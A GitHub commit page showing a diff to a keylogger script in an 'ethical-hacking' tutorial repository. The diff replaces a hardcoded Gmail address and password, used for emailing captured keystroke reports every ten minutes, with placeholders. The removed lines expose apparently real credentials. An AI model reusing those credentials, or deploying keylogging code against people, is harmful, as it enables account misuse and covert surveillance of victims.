We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 885651f commit 85a4b8eCopy full SHA for 85a4b8e
ethical-hacking/keylogger/keylogger.py
@@ -5,8 +5,8 @@
5
from threading import Semaphore, Timer
6
7
SEND_REPORT_EVERY = 600 # 10 minutes
8
-EMAIL_ADDRESS = "thepythoncode.sender@gmail.com"
9
-EMAIL_PASSWORD = "thepythoncodeokok123"
+EMAIL_ADDRESS = "put_real_address_here@gmail.com"
+EMAIL_PASSWORD = "put_real_pw"
10
11
class Keylogger:
12
def __init__(self, interval):
0 commit comments